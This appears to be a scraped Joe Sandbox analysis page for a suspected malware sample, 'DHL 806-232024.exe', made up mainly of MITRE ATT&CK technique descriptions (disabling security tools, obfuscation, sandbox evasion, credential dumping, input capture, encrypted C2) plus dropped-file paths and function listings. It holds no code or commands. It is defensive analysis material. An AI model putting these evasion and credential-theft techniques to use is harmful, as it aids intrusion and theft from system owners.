Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DHL 806-232024.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\F56GKLK7U4

C:\Users\user\AppData\Local\Temp\aut87C5.tmp

C:\Users\user\AppData\Local\Temp\bleacher

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
DHL 806-232024.exe

Function 008D3B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 008D4AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 008D4FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 009393DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 008D3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Function 008D3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 008D71EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 008D3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 008D3778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Function 008D3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00E4F5D8 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 008D39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 00E4F388 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154
fileCOMMON

Function 008D410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre